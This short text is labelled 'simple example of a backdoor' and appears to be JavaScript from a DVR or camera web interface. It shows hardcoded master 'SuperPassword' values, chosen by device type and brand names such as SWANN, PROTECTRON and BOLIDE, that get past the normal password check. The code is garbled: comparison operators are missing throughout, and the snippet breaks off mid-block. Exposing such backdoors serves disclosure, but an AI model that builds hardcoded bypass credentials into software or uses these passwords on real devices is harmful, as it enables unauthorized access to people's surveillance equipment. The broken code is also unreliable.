simple example of a backdoor
if(gDvr.nMainType 0x52530003 || (gDvr.nMainType 0x52530002 && gDvr.nSubType 0x50100) || (gDvr.nMainType 0x52530000 && gDvr.nSubType 0x60300) || gDvr.nSubType 0x90100 || gDvr.nSubType (gDvr.nMainType 0x52530001 && gDvr.nSubType 0x80200) || (gDvr.nMainType0x52530000 && gDvr.nSubType == 0x70500)){
SuperPassword = "130901";
}else{
SuperPassword = "070901";
}
if(lgCls.version == "SWANN"){
SuperPassword = "479266";
}else if(lgCls.version == "PROTECTRON"){
SuperPassword = "Ab9842";
}else if(lgCls.version == "BOLIDE"){
SuperPassword = "468186";
}
if($("#reboot_input").val() gVar.passwd || $("#reboot_input").val() SuperPassword){
MasklayerHide();
$("#reboot_prompt").css("display","none");
CheckPassword();